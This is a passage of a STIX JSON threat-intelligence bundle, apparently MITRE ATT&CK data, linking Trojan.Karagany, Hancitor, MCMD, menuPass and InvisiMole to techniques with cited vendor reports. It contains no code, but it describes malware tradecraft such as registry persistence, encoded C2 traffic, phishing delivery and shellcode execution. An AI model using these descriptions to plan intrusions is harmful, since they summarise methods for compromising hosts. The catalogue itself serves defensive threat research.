"Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can monitor the titles of open windows to identify specific keywords.(Citation: Secureworks Karagany July 2019)\t ", + "relationship_type": "uses", + "id": "relationship--25bfb4d8-c401-4064-9ee4-24091cb86ba6", + "type": "relationship", + "modified": "2020-08-13T14:58:25.173Z", + "created": "2020-08-13T14:58:25.173Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information on the network configuration of a compromised host.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--c1ea9582-0477-4226-a0ba-af03255d01dd", + "type": "relationship", + "modified": "2020-08-13T14:58:25.231Z", + "created": "2020-08-13T14:58:25.231Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [netstat](https://attack.mitre.org/software/S0104) to collect a list of network connections.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--0f6041e9-c2cb-4a22-951d-13587fe4a547", + "type": "relationship", + "modified": "2020-08-13T14:58:25.243Z", + "created": "2020-08-13T14:58:25.243Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture information regarding the victim's OS, security, and hardware configuration.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--5a415555-1367-47dd-9757-88a86430cf49", + "type": "relationship", + "modified": "2020-08-13T14:58:25.308Z", + "created": "2020-08-13T14:58:25.308Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09", + "type": "relationship", + "modified": "2020-08-13T14:58:25.315Z", + "created": "2020-08-13T14:58:25.315Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + }, + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient\u2019s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--ffecf9e6-6966-4535-934f-4fd4696875b0", + "type": "relationship", + "modified": "2020-09-02T19:54:00.926Z", + "created": "2020-08-13T16:45:46.972Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + }, + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has used Base64 to encode malicious links. [Hancitor](https://attack.mitre.org/software/S0499) has also delivered compressed payloads in ZIP files to victims.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--c8fb4459-4352-4ee6-bfaf-a97be333bf64", + "type": "relationship", + "modified": "2020-09-02T19:29:12.262Z", + "created": "2020-08-13T16:45:47.006Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has the ability to download additional files from C2.(Citation: Threatpost Hancitor)", + "relationship_type": "uses", + "id": "relationship--3d902953-306b-48d4-be7b-f08030ecb62e", + "type": "relationship", + "modified": "2020-08-13T16:45:47.049Z", + "created": "2020-08-13T16:45:47.049Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has relied upon users clicking on a malicious link delivered through phishing.(Citation: Threatpost Hancitor)", + "relationship_type": "uses", + "id": "relationship--471304cd-f98a-49f7-a33e-2d69ab6c8a47", + "type": "relationship", + "modified": "2020-08-13T16:45:47.078Z", + "created": "2020-08-13T16:45:47.078Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails which contained malicious links.(Citation: Threatpost Hancitor)", + "relationship_type": "uses", + "id": "relationship--c1b55dea-5e5d-4cff-bfac-5880507389c1", + "type": "relationship", + "modified": "2020-08-13T16:45:47.111Z", + "created": "2020-08-13T16:45:47.111Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--f60f8552-3c43-4b43-ad23-2b00b6172b00", + "type": "relationship", + "modified": "2020-09-02T19:54:01.155Z", + "created": "2020-08-13T16:51:23.474Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has added Registry Run keys to establish persistence.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--57c700c6-e301-4433-84bd-722934f9d922", + "type": "relationship", + "modified": "2020-09-02T19:29:12.321Z", + "created": "2020-08-13T16:51:23.515Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has deleted files using the VBA kill function.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--f58a02ed-055f-461f-bfdf-067f07310423", + "type": "relationship", + "modified": "2020-10-16T00:41:06.761Z", + "created": "2020-08-13T16:51:23.549Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has used PowerShell to execute commands.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--5a54aabe-e485-4a01-b284-cb080b11582b", + "type": "relationship", + "modified": "2020-09-02T19:29:12.507Z", + "created": "2020-08-13T16:51:23.585Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has used CallWindowProc and EnumResourceTypesA to interpret and execute shellcode.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--51fb8815-6f59-46ff-8f7a-98025623db76", + "type": "relationship", + "modified": "2020-09-02T19:29:12.537Z", + "created": "2020-08-13T16:51:23.587Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails with malicious attachments.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--554fbee8-58a9-4557-bf49-f1df2c5da442", + "type": "relationship", + "modified": "2020-09-02T19:29:12.575Z", + "created": "2020-08-13T16:51:23.629Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "id": "relationship--1d56986b-e6fd-4624-87b4-5e0dd9f05c2f", + "type": "relationship", + "modified": "2020-09-02T19:29:12.611Z", + "created": "2020-08-13T16:51:23.635Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f", + "target_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "external_references": [ + { + "url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.", + "source_name": "PWC Cloud Hopper Technical Annex April 2017" + } + ], + "description": "[menuPass](https://attack.mitre.org/groups/G0045) has used InstallUtil.exe to execute malicious software.(Citation: PWC Cloud Hopper Technical Annex April 2017)", + "relationship_type": "uses", + "id": "relationship--70fa0bd3-3fbb-4fda-9de2-2b751f9552e7", + "type": "relationship", + "modified": "2020-08-13T17:15:14.575Z", + "created": "2020-08-13T17:15:14.575Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can upload additional files to a compromised host.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--ceaf4145-f168-4bba-8480-d3650bcc657f", + "type": "relationship", + "modified": "2020-08-13T17:22:45.929Z", + "created": "2020-08-13T17:22:45.929Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can perform reconnaissance commands on a victim machine via a cmd.exe process.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "id": "relationship--deab6c7f-8d5e-4c77-ab58-3d8cf9c2adf4", + "type": "relationship", + "modified": "2020-08-13T17:38:23.721Z", + "created": "2020-08-13T17:38:23.721Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) has the ability to upload files from an infected device.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--c2e6b2a9-86b7-439a-88ac-dd2c34456d71", + "type": "relationship", + "modified": "2020-08-13T18:21:08.277Z", + "created": "2020-08-13T18:21:08.277Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can Base64 encode output strings prior to sending to C2.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--aefb92ff-56e9-47d9-adc9-ed504f271863", + "type": "relationship", + "modified": "2020-08-13T18:21:08.344Z", + "created": "2020-08-13T18:21:08.344Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--7692e54c-eb9e-4051-afab-e810dff4cd77", + "type": "relationship", + "modified": "2020-08-13T18:21:08.397Z", + "created": "2020-08-13T18:21:08.397Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) has the ability to remove set Registry Keys.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--1ab8abb0-0556-4de1-aa94-13b8f17390b9", + "type": "relationship", + "modified": "2020-08-13T18:21:08.458Z", + "created": "2020-08-13T18:21:08.457Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) has been named Readme.txt to appear legitimate.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--81791886-02a4-4417-a2e7-d44f5a7f83bf", + "type": "relationship", + "modified": "2020-08-13T18:21:08.515Z", + "created": "2020-08-13T18:21:08.515Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can use scheduled tasks for persistence.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--bb16d8ce-3017-4835-a282-b11d10abc8a1", + "type": "relationship", + "modified": "2020-08-13T18:21:08.562Z", + "created": "2020-08-13T18:21:08.562Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can use Registry Run Keys for persistence.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--f5a39799-22d3-42e6-b524-bd93744b0149", + "type": "relationship", + "modified": "2020-08-13T18:21:08.572Z", + "created": "2020-08-13T18:21:08.572Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can modify processes to prevent them from being visible on the desktop.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--57cb89ed-ead5-46b1-ade9-68e580274f65", + "type": "relationship", + "modified": "2020-08-13T18:21:08.617Z", + "created": "2020-08-13T18:21:08.617Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--975737f1-b10d-476f-8bda-3ec26ea57172", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + } + ], + "description": "[MCMD](https://attack.mitre.org/software/S0500) can launch a console process (cmd.exe) with redirected standard input and output.(Citation: Secureworks MCMD July 2019)", + "relationship_type": "uses", + "id": "relationship--4e86ae1c-a19a-4aad-a030-6102f9fb439e", + "type": "relationship", + "modified": "2020-08-13T18:21:08.691Z", + "created": "2020-08-13T18:21:08.691Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can use a .lnk shortcut for the Control Panel to establish persistence.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--db61e886-9295-4df7-a9db-25d7b9879b82", + "type": "relationship", + "modified": "2020-08-18T13:13:32.120Z", + "created": "2020-08-17T12:57:12.103Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can place a lnk file in the Startup Folder to achieve persistence.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--3434121e-a4d6-43a7-b905-78c52f5a12bd", + "type": "relationship", + "modified": "2020-08-17T12:57:12.185Z", + "created": "2020-08-17T12:57:12.185Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": 